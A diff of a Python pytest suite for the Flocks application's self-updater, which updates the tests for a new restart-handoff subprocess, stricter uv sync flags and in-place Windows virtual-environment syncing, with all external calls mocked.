@@ -1579,27 +1572,30 @@ async def fake_sleep(_seconds) -> None:
         lambda *_args, **_kwargs: events.append("replace")
         or shutil.copytree(staged_webui, install_root / "webui", dirs_exist_ok=True),
     )
-    monkeypatch.setattr(updater, "_write_version_marker", lambda version: events.append(f"marker:{version}"))
-    monkeypatch.setattr(updater, "_refresh_global_cli_entry", lambda _root: None)
     monkeypatch.setattr(updater, "_build_restart_argv", lambda install_root=None: ["/usr/bin/python3", "-m", "flocks.cli.main", "start"])
     monkeypatch.setattr(updater.asyncio, "sleep", fake_sleep)
     monkeypatch.setattr(updater, "_rollback_failed_update", lambda *_args: events.append("rollback"))
     monkeypatch.setattr(updater, "rollback_upgrade_handover", lambda *_args: events.append("rollback_handover"))
-    monkeypatch.setattr(updater.os, "execv", lambda *_args: (_ for _ in ()).throw(OSError("boom")))
+    monkeypatch.setattr(updater.subprocess, "Popen", lambda argv, **_kwargs: popen_calls.append(list(argv)) or SimpleNamespace(pid=4321))
+    monkeypatch.setattr(updater.os, "_exit", lambda code: (_ for _ in ()).throw(SystemExit(code)))
 
-    progresses = []
-    async for step in updater.perform_update("2026.4.1"):
-        progresses.append(step)
+    with pytest.raises(SystemExit, match="0"):
+        async for _step in updater.perform_update("2026.4.1"):
+            pass
 
-    assert progresses[-1].stage == "error"
-    assert "Failed to restart service" in progresses[-1].message
-    assert events[:2] == ["replace", "uv-sync"]
-    assert "marker:2026.4.1" in events
+    assert events[:2] == ["replace", "sleep"]
     assert "handover" in events
-    assert events.index("handover") > events.index("uv-sync")
-    assert events.index("npm-install") > events.index("handover")
-    assert events.index("npm-build") > events.index("npm-install")
-    assert "rollback_handover" in events
+    assert len(popen_calls) == 1
+    handoff_argv = popen_calls[0]
+    assert handoff_argv[:3] == ["/usr/bin/python3", "-m", "flocks.updater.restart_handoff"]
+    assert "--uv-path" in handoff_argv
+    assert "--version" in handoff_argv
+    assert handoff_argv[handoff_argv.index("--") + 1 :] == [
+        "/usr/bin/python3",
+        "-m",
+        "flocks.cli.main",
+        "start",
+    ]
 
 
 @pytest.mark.asyncio
@@ -1680,7 +1676,7 @@ async def fake_sleep(_seconds) -> None:
 
     assert progresses[-1].stage == "error"
     assert progresses[-1].message == "Failed to prepare WebUI handover: handover boom"
-    assert events == ["replace", "uv-sync", "marker:2026.4.1", "restore"]
+    assert events == ["replace", "restore"]
 
 
 @pytest.mark.asyncio
@@ -1691,6 +1687,8 @@ async def test_perform_update_uses_cn_mirror_profile_for_sources_and_dependency_
     archive_path = tmp_path / "flocks.tar.gz"
     archive_path.write_text("archive", encoding="utf-8")
     staged_root = tmp_path / "staged"
+    install_root = tmp_path / "install-root"
+    _prepare_real_restart_runtime(install_root)
     staged_webui = staged_root / "webui"
     staged_webui.mkdir(parents=True)
     (staged_webui / "package.json").write_text("{}", encoding="utf-8")
@@ -1722,7 +1720,7 @@ async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
         return 0, "", ""
 
     monkeypatch.setattr(updater, "_get_updater_config", fake_get_updater_config)
-    monkeypatch.setattr(updater, "_get_repo_root", lambda: tmp_path / "install-root")
+    monkeypatch.setattr(updater, "_get_repo_root", lambda: install_root)
     monkeypatch.setattr(updater, "get_current_version", lambda: "2026.3.31")
     monkeypatch.setattr(updater, "_download_with_fallback", fake_download_with_fallback)
     monkeypatch.setattr(updater, "_backup_current_version", lambda *_args, **_kwargs: tmp_path / "backup.tar.gz")
@@ -1750,7 +1748,14 @@ async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
     assert captured["sources"] == ["gitee", "github"]
     assert run_calls == [
         (
-            ["/usr/bin/uv", "sync", "--default-index", "https://mirrors.aliyun.com/pypi/simple"],
+            [
+                "/usr/bin/uv",
+                "sync",
+                "--frozen",
+                "--no-python-downloads",
+                "--default-index",
+                "https://mirrors.aliyun.com/pypi/simple",
+            ],
             None,
         ),
     ]
@@ -1764,6 +1769,8 @@ async def test_perform_update_retries_cn_uv_sync_with_default_source(
     archive_path = tmp_path / "flocks.tar.gz"
     archive_path.write_text("archive", encoding="utf-8")
     staged_root = tmp_path / "staged"
+    install_root = tmp_path / "install-root"
+    _prepare_real_restart_runtime(install_root)
 
     run_calls: list[list[str]] = []
 
@@ -1781,7 +1788,14 @@ async def fake_get_updater_config():
 
     async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
         run_calls.append(list(cmd))
-        if cmd == ["/usr/bin/uv", "sync", "--default-index", "https://mirrors.aliyun.com/pypi/simple"]:
+        if cmd == [
+            "/usr/bin/uv",
+            "sync",
+            "--frozen",
+            "--no-python-downloads",
+            "--default-index",
+            "https://mirrors.aliyun.com/pypi/simple",
+        ]:
             return 1, "", "403 Forbidden"
         return 0, "", ""
 
@@ -1792,7 +1806,7 @@ async def fake_sleep(_seconds) -> None:
         pass
 
     monkeypatch.setattr(updater, "_get_updater_config", fake_get_updater_config)
-    monkeypatch.setattr(updater, "_get_repo_root", lambda: tmp_path / "install-root")
+    monkeypatch.setattr(updater, "_get_repo_root", lambda: install_root)
     monkeypatch.setattr(updater, "get_current_version", lambda: "2026.3.31")
     monkeypatch.setattr(updater, "_download_with_fallback", fake_download_with_fallback)
     monkeypatch.setattr(updater, "_backup_current_version", lambda *_args, **_kwargs: tmp_path / "backup.tar.gz")
@@ -1808,8 +1822,15 @@ async def fake_sleep(_seconds) -> None:
 
     assert progresses[-1].stage == "done"
     assert run_calls == [
-        ["/usr/bin/uv", "sync", "--default-index", "https://mirrors.aliyun.com/pypi/simple"],
-        ["/usr/bin/uv", "sync"],
+        [
+            "/usr/bin/uv",
+            "sync",
+            "--frozen",
+            "--no-python-downloads",
+            "--default-index",
+            "https://mirrors.aliyun.com/pypi/simple",
+        ],
+        ["/usr/bin/uv", "sync", "--frozen", "--no-python-downloads"],
     ]
 
 
@@ -1828,6 +1849,7 @@ async def test_perform_update_prefers_bundled_npm_for_windows_frontend_rebuild(
     (staged_webui / "dist" / "index.html").write_text("<html></html>", encoding="utf-8")
     install_root = tmp_path / "install-root"
     install_root.mkdir()
+    _prepare_real_restart_runtime(install_root)
 
     node_home = tmp_path / "tools" / "node"
     node_home.mkdir(parents=True)
@@ -1856,9 +1878,6 @@ async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
         run_calls.append((list(cmd), env))
         return 0, "", ""
 
-    async def fake_validate_windows_restart_runtime(*_args, **_kwargs):
-        return None
-
     monkeypatch.setattr(updater, "_get_updater_config", fake_get_updater_config)
     monkeypatch.setattr(updater, "_get_repo_root", lambda: install_root)
     monkeypatch.setattr(updater, "get_current_version", lambda: "2026.3.31")
@@ -1868,7 +1887,6 @@ async def fake_validate_windows_restart_runtime(*_args, **_kwargs):
     monkeypatch.setattr(updater, "_run_async", fake_run_async)
     monkeypatch.setattr(updater, "_find_executable", lambda name: r"C:\Users\flocks\AppData\Local\Programs\Flocks\tools\uv\uv.exe" if name == "uv" else None)
     monkeypatch.setattr(updater, "_build_uv_sync_env", lambda: None)
-    monkeypatch.setattr(updater, "_validate_windows_restart_runtime", fake_validate_windows_restart_runtime)
     monkeypatch.setattr(
         updater,
         "_replace_install_dir",
@@ -1876,17 +1894,13 @@ async def fake_validate_windows_restart_runtime(*_args, **_kwargs):
     )
     monkeypatch.setattr(updater, "_write_version_marker", lambda _v: None)
     monkeypatch.setattr(updater.sys, "platform", "win32")
-    monkeypatch.setattr(updater, "_prepare_upgrade_handover", lambda _version: None)
-    monkeypatch.setattr(updater, "_build_restart_argv", lambda install_root=None: [r"C:\tool\python.exe", "-m", "flocks.cli.main", "start"])
-    monkeypatch.setattr(updater.subprocess, "Popen", lambda *_args, **_kwargs: SimpleNamespace(pid=4321))
-    monkeypatch.setattr(updater.os, "_exit", lambda code: (_ for _ in ()).throw(SystemExit(code)))
     monkeypatch.setenv("FLOCKS_NODE_HOME", str(node_home))
     monkeypatch.delenv("FLOCKS_INSTALL_ROOT", raising=False)
     monkeypatch.setenv("PATH", "/usr/bin:/bin")
 
-    with pytest.raises(SystemExit, match="0"):
-        async for _step in updater.perform_update("2026.4.1", locale="zh-CN"):
-            pass
+    progresses = [step async for step in updater.perform_update("2026.4.1", restart=False, locale="zh-CN")]
+
+    assert progresses[-1].stage == "done"
     frontend_calls = [
         call for call in run_calls if call[0][0] == str(bundled_npm)
     ]
@@ -1917,6 +1931,7 @@ async def test_perform_update_retries_windows_frontend_with_system_npm_after_bun
     (staged_webui / "package.json").write_text("{}", encoding="utf-8")
     install_root = tmp_path / "install-root"
     install_root.mkdir()
+    _prepare_real_restart_runtime(install_root)
     install_webui = install_root / "webui"
 
     node_home = tmp_path / "tools" / "node"
@@ -1968,9 +1983,6 @@ async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
             return 0, "", ""
         raise AssertionError(f"unexpected command: {cmd}")
 
-    async def fake_validate_windows_restart_runtime(*_args, **_kwargs):
-        return None
-
     def fake_find(name: str) -> str | None:
         if name == "npm.cmd":
             return system_npm
@@ -1987,7 +1999,6 @@ def fake_find(name: str) -> str | None:
     monkeypatch.setattr(updater, "_run_async", fake_run_async)
     monkeypatch.setattr(updater, "_find_executable", fake_find)
     monkeypatch.setattr(updater, "_build_uv_sync_env", lambda: None)
-    monkeypatch.setattr(updater, "_validate_windows_restart_runtime", fake_validate_windows_restart_runtime)
     monkeypatch.setattr(
         updater,
         "_replace_install_dir",
@@ -1995,17 +2006,13 @@ def fake_find(name: str) -> str | None:
     )
     monkeypatch.setattr(updater, "_write_version_marker", lambda _v: None)
     monkeypatch.setattr(updater.sys, "platform", "win32")
-    monkeypatch.setattr(updater, "_prepare_upgrade_handover", lambda _version: None)
-    monkeypatch.setattr(updater, "_build_restart_argv", lambda install_root=None: [r"C:\tool\python.exe", "-m", "flocks.cli.main", "start"])
-    monkeypatch.setattr(updater.subprocess, "Popen", lambda *_args, **_kwargs: SimpleNamespace(pid=4321))
-    monkeypatch.setattr(updater.os, "_exit", lambda code: (_ for _ in ()).throw(SystemExit(code)))
     monkeypatch.setenv("FLOCKS_NODE_HOME", str(node_home))
     monkeypatch.delenv("FLOCKS_INSTALL_ROOT", raising=False)
     monkeypatch.setenv("PATH", "/usr/bin:/bin")
 
-    with pytest.raises(SystemExit, match="0"):
-        async for _step in updater.perform_update("2026.4.1", locale="zh-CN"):
-            pass
+    progresses = [step async for step in updater.perform_update("2026.4.1", restart=False, locale="zh-CN")]
+
+    assert progresses[-1].stage == "done"
     frontend_calls = [
         call for call in run_calls if call[0][0] in {str(bundled_npm), system_npm}
     ]
@@ -2116,6 +2123,7 @@ async def test_perform_update_retries_windows_frontend_with_full_timeout_after_b
     (staged_webui / "package-lock.json").write_text("{}", encoding="utf-8")
     install_root = tmp_path / "install-root"
     install_root.mkdir()
+    _prepare_real_restart_runtime(install_root)
     install_webui = install_root / "webui"
 
     node_home = tmp_path / "tools" / "node"
@@ -2165,9 +2173,6 @@ async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
             return 0, "", ""
         raise AssertionError(f"unexpected command: {cmd}")
 
-    async def fake_validate_windows_restart_runtime(*_args, **_kwargs):
-        return None
-
     def fake_find(name: str) -> str | None:
         if name == "npm.cmd":
             return system_npm
@@ -2184,7 +2189,6 @@ def fake_find(name: str) -> str | None:
     monkeypatch.setattr(updater, "_run_async", fake_run_async)
     monkeypatch.setattr(updater, "_find_executable", fake_find)
     monkeypatch.setattr(updater, "_build_uv_sync_env", lambda: None)
-    monkeypatch.setattr(updater, "_validate_windows_restart_runtime", fake_validate_windows_restart_runtime)
     monkeypatch.setattr(
         updater,
         "_replace_install_dir",
@@ -2192,17 +2196,13 @@ def fake_find(name: str) -> str | None:
     )
     monkeypatch.setattr(updater, "_write_version_marker", lambda _v: None)
     monkeypatch.setattr(updater.sys, "platform", "win32")
-    monkeypatch.setattr(updater, "_prepare_upgrade_handover", lambda _version: None)
-    monkeypatch.setattr(updater, "_build_restart_argv", lambda install_root=None: [r"C:\tool\python.exe", "-m", "flocks.cli.main", "start"])
-    monkeypatch.setattr(updater.subprocess, "Popen", lambda *_args, **_kwargs: SimpleNamespace(pid=4321))
-    monkeypatch.setattr(updater.os, "_exit", lambda code: (_ for _ in ()).throw(SystemExit(code)))
     monkeypatch.setenv("FLOCKS_NODE_HOME", str(node_home))
     monkeypatch.delenv("FLOCKS_INSTALL_ROOT", raising=False)
     monkeypatch.setenv("PATH", "/usr/bin:/bin")
 
-    with pytest.raises(SystemExit, match="0"):
-        async for _step in updater.perform_update("2026.4.1", locale="zh-CN"):
-            pass
+    progresses = [step async for step in updater.perform_update("2026.4.1", restart=False, locale="zh-CN")]
+
+    assert progresses[-1].stage == "done"
     frontend_calls = [
         call for call in run_calls if call[0][0] in {str(bundled_npm), system_npm}
     ]
@@ -2225,6 +2225,8 @@ async def test_perform_update_errors_when_uv_not_found(
     archive_path = tmp_path / "flocks.tar.gz"
     archive_path.write_text("archive", encoding="utf-8")
     staged_root = tmp_path / "staged"
+    install_root = tmp_path / "install-root"
+    _prepare_real_restart_runtime(install_root)
 
     async def fake_get_updater_config():
         return SimpleNamespace(
@@ -2239,7 +2241,7 @@ async def fake_get_updater_config():
         )
 
     monkeypatch.setattr(updater, "_get_updater_config", fake_get_updater_config)
-    monkeypatch.setattr(updater, "_get_repo_root", lambda: tmp_path / "install-root")
+    monkeypatch.setattr(updater, "_get_repo_root", lambda: install_root)
     monkeypatch.setattr(updater, "get_current_version", lambda: "2026.3.31")
     monkeypatch.setattr(updater.sys, "platform", "linux")
 
@@ -2300,7 +2302,10 @@ async def fake_download(**_kw):
         return archive_path
 
     monkeypatch.setattr(updater, "_get_updater_config", fake_get_updater_config)
-    monkeypatch.setattr(updater, "_get_repo_root", lambda: tmp_path / "install-root")
+    install_root = tmp_path / "install-root"
+    _prepare_real_restart_runtime(install_root)
+
+    monkeypatch.setattr(updater, "_get_repo_root", lambda: install_root)
     monkeypatch.setattr(updater, "get_current_version", lambda: "2026.3.31")
     monkeypatch.setattr(updater, "_download_with_fallback", fake_download)
     monkeypatch.setattr(updater, "_backup_current_version", lambda *_a, **_kw: tmp_path / "backup.tar.gz")
@@ -2323,6 +2328,65 @@ async def fake_sleep(_s):
     assert call_count == 2
 
 
+@pytest.mark.asyncio
+async def test_perform_update_syncs_windows_venv_in_place(  # win32 update with restart=False: uv sync runs while the existing .venv interpreter is still in place
+    monkeypatch: pytest.MonkeyPatch,
+    tmp_path: Path,
+) -> None:
+    archive_path = tmp_path / "flocks.zip"
+    archive_path.write_text("archive", encoding="utf-8")  # placeholder payload; _extract_archive is stubbed below
+    staged_root = tmp_path / "staged"
+    staged_root.mkdir()
+    install_root = tmp_path / "install-root"
+    old_python = install_root / ".venv" / "Scripts" / "python.exe"
+    old_python.parent.mkdir(parents=True)
+    old_python.write_text("old", encoding="utf-8")  # sentinel content, re-read after the update
+
+    sync_calls: list[tuple[list[str], Path | None]] = []  # (cmd, cwd) of every command containing "sync"
+
+    async def fake_get_updater_config():  # stand-in for updater._get_updater_config
+        return SimpleNamespace(
+            archive_format="zip",
+            sources=["github"],
+            repo="AgentFlocks/Flocks",
+            token=None,
+            gitee_token=None,
+            backup_retain_count=3,
+            base_url=None,
+            gitee_repo=None,
+        )
+
+    async def fake_download(**_kw):  # stand-in for updater._download_with_fallback
+        return archive_path
+
+    async def fake_run_async(cmd, cwd=None, timeout=None, env=None):  # stand-in for updater._run_async; always reports success
+        if "sync" in cmd:
+            sync_calls.append((cmd, cwd))
+            assert (install_root / ".venv" / "Scripts" / "python.exe").exists()  # interpreter must still exist while sync runs
+        return 0, "", ""
+
+    monkeypatch.setattr(updater.sys, "platform", "win32")  # exercise the Windows code path
+    monkeypatch.setattr(updater, "_get_updater_config", fake_get_updater_config)
+    monkeypatch.setattr(updater, "_get_repo_root", lambda: install_root)
+    monkeypatch.setattr(updater, "get_current_version", lambda: "2026.3.31")
+    monkeypatch.setattr(updater, "_download_with_fallback", fake_download)
+    monkeypatch.setattr(updater, "_backup_current_version", lambda *_a, **_kw: tmp_path / "backup.tar.gz")
+    monkeypatch.setattr(updater, "_extract_archive", lambda *_a, **_kw: staged_root)
+    monkeypatch.setattr(updater, "_replace_install_dir", lambda *_a, **_kw: None)  # no-op, so install_root keeps the files created above
+    monkeypatch.setattr(updater, "_run_async", fake_run_async)
+    monkeypatch.setattr(updater, "_find_executable", lambda _name: r"C:\tools\uv.exe")
+    monkeypatch.setattr(updater, "_build_uv_sync_env", lambda: None)
+    monkeypatch.setattr(updater, "_write_version_marker", lambda _v: None)
+    monkeypatch.setattr(updater, "_refresh_global_cli_entry", lambda _root: None)
+
+    progresses = [step async for step in updater.perform_update("2026.4.1", restart=False)]  # drain the async generator
+
+    assert progresses[-1].stage == "done"
+    assert sync_calls == [([r"C:\tools\uv.exe", "sync", "--frozen", "--no-python-downloads"], install_root)]  # exactly one sync call, with cwd=install_root
+    assert (install_root / ".venv" / "Scripts" / "python.exe").read_text(encoding="utf-8") == "old"  # sentinel content unchanged
+    assert not (install_root / ".venv.flocks_backup").exists()  # no .venv.flocks_backup path exists afterwards
+
+
 @pytest.mark.asyncio
 async def test_perform_update_rolls_back_when_windows_uv_sync_times_out(
     monkeypatch: pytest.MonkeyPatch,
@@ -2336,6 +2400,10 @@ async def test_perform_update_rolls_back_when_windows_uv_sync_times_out(
     (staged_webui / "package.json").write_text("{}", encoding="utf-8")
     (staged_webui / "dist").mkdir()
     (staged_webui / "dist" / "index.html").write_text("<html></html>", encoding="utf-8")
+    install_root = tmp_path / "install-root"
+    old_python = install_root / ".venv" / "Scripts" / "python.exe"
+    old_python.parent.mkdir(parents=True)
+    old_python.write_text("old", encoding="utf-8")
 
     events: list[str] = []
 
@@ -2356,12 +2424,15 @@ async def fake_download(**_kw):
 
     async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
         if "sync" in cmd:
+            new_python = install_root / ".venv" / "Scripts" / "python.exe"
+            new_python.parent.mkdir(parents=True, exist_ok=True)
+            new_python.write_text("new", encoding="utf-8")
             raise subprocess.TimeoutExpired(cmd=cmd, timeout=timeout or 0)
         return 0, "", ""
 
     monkeypatch.setattr(updater.sys, "platform", "win32")
     monkeypatch.setattr(updater, "_get_updater_config", fake_get_updater_config)
-    monkeypatch.setattr(updater, "_get_repo_root", lambda: tmp_path / "install-root")
+    monkeypatch.setattr(updater, "_get_repo_root", lambda: install_root)
     monkeypatch.setattr(updater, "get_current_version", lambda: "2026.3.31")
     monkeypatch.setattr(updater, "_download_with_fallback", fake_download)
     monkeypatch.setattr(updater, "_backup_current_version", lambda *_a, **_kw: tmp_path / "backup.tar.gz")
@@ -2384,6 +2455,9 @@ async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
         f"Dependency sync timed out after {expected_timeout}s while running uv sync."
     )
     assert events == ["restore"]
+    assert (install_root / ".venv" / "Scripts" / "python.exe").read_text(encoding="utf-8") == "new"
+    assert not (install_root / ".venv.flocks_failed").exists()
+    assert not (install_root / ".venv.flocks_backup").exists()
 
 
 @pytest.mark.asyncio
@@ -2494,12 +2568,12 @@ async def fake_download(**_kw):
     async def fake_sleep(seconds):
         sleep_calls.append(seconds)
 
-    async def fake_validate_windows_restart_runtime(_install_root: Path) -> str | None:
-        return None
+    install_root = tmp_path / "install-root"
+    _prepare_real_restart_runtime(install_root)
 
     monkeypatch.setattr(updater.sys, "platform", "win32")
     monkeypatch.setattr(updater, "_get_updater_config", fake_get_updater_config)
-    monkeypatch.setattr(updater, "_get_repo_root", lambda: tmp_path / "install-root")
+    monkeypatch.setattr(updater, "_get_repo_root", lambda: install_root)
     monkeypatch.setattr(updater, "get_current_version", lambda: "2026.3.31")
     monkeypatch.setattr(updater, "_download_with_fallback", fake_download)
     monkeypatch.setattr(updater, "_backup_current_version", lambda *_a, **_kw: tmp_path / "backup.tar.gz")
@@ -2511,7 +2585,6 @@ async def fake_validate_windows_restart_runtime(_install_root: Path) -> str | No
     monkeypatch.setattr(updater, "_write_version_marker", lambda _v: None)
     monkeypatch.setattr(updater, "_refresh_global_cli_entry", lambda _root: None)
     monkeypatch.setattr(updater, "_repair_windows_uv_managed_python_install", lambda text: repaired_messages.append(text) or Path(r"C:\Users\worker\AppData\Roaming\uv\python\cpython-3.12-windows-x86_64-none"))
-    monkeypatch.setattr(updater, "_validate_windows_restart_runtime", fake_validate_windows_restart_runtime)
     monkeypatch.setattr(updater.asyncio, "sleep", fake_sleep)
 
     progresses = [
@@ -2637,9 +2710,6 @@ async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
             events.append("uv-sync")
         return 0, "", ""
 
-    async def fake_validate_windows_restart_runtime(_install_root: Path) -> str | None:
-        return "No module named uvicorn"
-
     def fake_replace_install_dir(*_args, **_kwargs):
         replace_attempts["count"] += 1
         events.append(f"replace-{replace_attempts['count']}")
@@ -2663,18 +2733,19 @@ def fake_replace_install_dir(*_args, **_kwargs):
     monkeypatch.setattr(updater, "_replace_install_dir", fake_replace_install_dir)
     monkeypatch.setattr(updater, "_rollback_failed_update", lambda *_args: events.append("rollback"))
     monkeypatch.setattr(updater, "_restore_backup_if_possible", lambda *_args: events.append("restore"))
-    monkeypatch.setattr(updater, "_validate_windows_restart_runtime", fake_validate_windows_restart_runtime)
+    monkeypatch.setattr(updater, "_build_restart_argv", lambda install_root=None: [r"C:\tool\python.exe", "-m", "flocks.cli.main", "start"])
+    monkeypatch.setattr(updater.subprocess, "Popen", lambda *_args, **_kwargs: events.append("popen") or SimpleNamespace(pid=4321))
+    monkeypatch.setattr(updater.os, "_exit", lambda code: (_ for _ in ()).throw(SystemExit(code)))
 
-    progresses = [step async for step in updater.perform_update("2026.4.1")]
+    with pytest.raises(SystemExit, match="0"):
+        async for _step in updater.perform_update("2026.4.1"):
+            pass
 
-    assert progresses[-1].stage == "error"
-    assert progresses[-1].message == "No module named uvicorn"
     assert events == [
         "replace-1",
         "handover",
         "replace-2",
-        "uv-sync",
-        "rollback",
+        "popen",
     ]
     assert "restore" not in events
 
@@ -2693,6 +2764,7 @@ async def test_perform_update_reports_frontend_dependency_install_timeout(
     (staged_webui / "package-lock.json").write_text("{}", encoding="utf-8")
     install_root = tmp_path / "install-root"
     install_root.mkdir()
+    _prepare_real_restart_runtime(install_root)
     install_webui = install_root / "webui"
 
     events: list[str] = []
@@ -2730,7 +2802,6 @@ async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
         "_find_executable",
         lambda name: "/usr/bin/npm" if name in {"npm", "npm.cmd"} else "/usr/bin/uv",
     )
-    monkeypatch.setattr(updater, "_prepare_upgrade_handover", lambda _version: events.append("handover") or {})
     monkeypatch.setattr(
         updater,
         "_replace_install_dir",
@@ -2738,20 +2809,18 @@ async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
         or shutil.copytree(staged_webui, install_webui, dirs_exist_ok=True),
     )
     monkeypatch.setattr(updater, "_write_version_marker", lambda _v: None)
-    monkeypatch.setattr(updater, "_build_restart_argv", lambda install_root=None: ["/usr/bin/python3", "-m", "flocks.cli.main", "start"])
-    monkeypatch.setattr(updater, "_rollback_failed_update", lambda *_args: events.append("rollback"))
+    monkeypatch.setattr(updater, "_restore_backup_if_possible", lambda *_args: events.append("restore"))
 
-    progresses = [step async for step in updater.perform_update("2026.4.1")]
+    progresses = [step async for step in updater.perform_update("2026.4.1", restart=False)]
 
     assert progresses[-1].stage == "error"
     assert progresses[-1].message == "Frontend dependency install timed out after 300s while running npm ci."
     assert events == [
         "replace",
-        "/usr/bin/uv sync",
-        "handover",
+        "/usr/bin/uv sync --frozen --no-python-downloads",
         "/usr/bin/npm install",
         "/usr/bin/npm ci",
-        "rollback",
+        "restore",
     ]
 
 
@@ -2768,6 +2837,7 @@ async def test_perform_update_rolls_back_handover_when_current_frontend_build_fa
     (staged_webui / "package.json").write_text("{}", encoding="utf-8")
     install_root = tmp_path / "install-root"
     install_root.mkdir()
+    _prepare_real_restart_runtime(install_root)
     install_webui = install_root / "webui"
 
     events: list[str] = []
@@ -2813,21 +2883,19 @@ async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
         "_find_executable",
         lambda name: "/usr/bin/npm" if name in {"npm", "npm.cmd"} else "/usr/bin/uv",
     )
-    monkeypatch.setattr(updater, "_prepare_upgrade_handover", lambda _version: events.append("handover") or {})
     monkeypatch.setattr(
         updater,
         "_replace_install_dir",
         lambda *_args, **_kwargs: events.append("replace")
         or shutil.copytree(staged_webui, install_webui, dirs_exist_ok=True),
     )
-    monkeypatch.setattr(updater, "_build_restart_argv", lambda install_root=None: ["/usr/bin/python3", "-m", "flocks.cli.main", "start"])
-    monkeypatch.setattr(updater, "_rollback_failed_update", lambda *_args: events.append("rollback"))
+    monkeypatch.setattr(updater, "_restore_backup_if_possible", lambda *_args: events.append("restore"))
 
-    progresses = [step async for step in updater.perform_update("2026.4.1")]
+    progresses = [step async for step in updater.perform_update("2026.4.1", restart=False)]
 
     assert progresses[-1].stage == "error"
     assert progresses[-1].message == "Frontend build failed: boom"
-    assert events == ["replace", "uv-sync", "handover", "npm-install", "npm-build", "rollback"]
+    assert events == ["replace", "uv-sync", "npm-install", "npm-build", "restore"]
 
 
 @pytest.mark.asyncio
@@ -2837,7 +2905,7 @@ async def test_perform_update_no_orphan_state_when_generator_abandoned_before_ha
 ) -> None:
     """SSE disconnect (GeneratorExit) at any yield point before handover
     must not leave upgrade state or orphan temp-page processes, because
-    the handover now happens after all yields (right before os.execv)."""
+    the handover now happens after all yields (right before restart spawn)."""
     monkeypatch.setenv("FLOCKS_ROOT", str(tmp_path / ".flocks"))
 
     archive_path = tmp_path / "flocks.zip"
@@ -2930,9 +2998,7 @@ async def fake_download_with_fallback(**_kwargs):
     async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
         return 0, "", ""
 
-    async def fake_validate_windows_restart_runtime(_install_root: Path) -> str | None:
-        return None
-
+    monkeypatch.setenv("FLOCKS_ROOT", str(tmp_path / ".flocks"))
     monkeypatch.setattr(updater.sys, "platform", "win32")
     monkeypatch.setattr(updater, "_get_updater_config", fake_get_updater_config)
     monkeypatch.setattr(updater, "_get_repo_root", lambda: tmp_path / "install-root")
@@ -2950,7 +3016,6 @@ async def fake_validate_windows_restart_runtime(_install_root: Path) -> str | No
     monkeypatch.setattr(updater, "_write_version_marker", lambda _v: None)
     monkeypatch.setattr(updater, "_refresh_global_cli_entry", lambda _root: None)
     monkeypatch.setattr(updater, "_build_restart_argv", lambda install_root=None: [r"C:\tool\python.exe", "-m", "flocks.cli.main", "start"])
-    monkeypatch.setattr(updater, "_validate_windows_restart_runtime", fake_validate_windows_restart_runtime)
     monkeypatch.setattr(updater, "_prepare_upgrade_handover", lambda _version: events.append("handover"))
     monkeypatch.setattr(updater.subprocess, "Popen", lambda argv, cwd=None, close_fds=False: popen_calls.append((list(argv), cwd, close_fds)) or SimpleNamespace(pid=4321))
     monkeypatch.setattr(updater.os, "_exit", lambda code: (_ for _ in ()).throw(SystemExit(code)))
@@ -2960,8 +3025,18 @@ async def fake_validate_windows_restart_runtime(_install_root: Path) -> str | No
         async for _step in updater.perform_update("2026.4.1"):
             pass
 
-    assert popen_calls == [
-        ([r"C:\tool\python.exe", "-m", "flocks.cli.main", "start"], tmp_path / "install-root", True),
+    assert len(popen_calls) == 1
+    handoff_argv, cwd, close_fds = popen_calls[0]
+    assert cwd == tmp_path / "install-root"
+    assert close_fds is True
+    assert handoff_argv[:3] == [r"C:\tool\python.exe", "-m", "flocks.updater.restart_handoff"]
+    assert "--parent-pid" in handoff_argv
+    assert "--backend-port" in handoff_argv
+    assert handoff_argv[handoff_argv.index("--") + 1 :] == [
+        r"C:\tool\python.exe",
+        "-m",
+        "flocks.cli.main",
+        "start",
     ]
     assert events == ["handover"]
     assert "execv" not in events
@@ -3001,8 +3076,8 @@ async def fake_download_with_fallback(**_kwargs):
     async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
         return 0, "", ""
 
-    async def fake_validate_windows_restart_runtime(_install_root: Path) -> str | None:
-        return "No module named uvicorn"
+    async def fake_validate_restart_runtime(_install_root: Path) -> str | None:
+        return "Restart runtime is missing: .venv/Scripts/python.exe"
 
     monkeypatch.setattr(updater.sys, "platform", "win32")
     monkeypatch.setattr(updater, "_get_updater_config", fake_get_updater_config)
@@ -3020,14 +3095,13 @@ async def fake_validate_windows_restart_runtime(_install_root: Path) -> str | No
     monkeypatch.setattr(updater, "_replace_install_dir", lambda *_args, **_kwargs: None)
     monkeypatch.setattr(updater, "_write_version_marker", lambda _v: events.append("marker"))
     monkeypatch.setattr(updater, "_restore_backup_if_possible", lambda *_args: events.append("restore"))
-    monkeypatch.setattr(updater, "_validate_windows_restart_runtime", fake_validate_windows_restart_runtime)
-    monkeypatch.setattr(updater, "_prepare_upgrade_handover", lambda _version: events.append("handover"))
+    monkeypatch.setattr(updater, "_validate_restart_runtime", fake_validate_restart_runtime)
     monkeypatch.setattr(updater.subprocess, "Popen", lambda *_args, **_kwargs: events.append("popen"))
 
-    progresses = [step async for step in updater.perform_update("2026.4.1")]
+    progresses = [step async for step in updater.perform_update("2026.4.1", restart=False)]
 
     assert progresses[-1].stage == "error"
-    assert progresses[-1].message == "No module named uvicorn"
+    assert progresses[-1].message == "Restart runtime is missing: .venv/Scripts/python.exe"
     assert events == ["restore"]
 
 
@@ -3127,9 +3201,6 @@ async def fake_download_with_fallback(**_kwargs):
     async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
         return 0, "", ""
 
-    async def fake_validate(_install_root: Path) -> str | None:
-        return None
-
     monkeypatch.setattr(updater.sys, "platform", "win32")
     monkeypatch.setattr(updater, "_get_updater_config", fake_get_updater_config)
     monkeypatch.setattr(updater, "_get_repo_root", lambda: tmp_path / "install-root")
@@ -3147,7 +3218,6 @@ async def fake_validate(_install_root: Path) -> str | None:
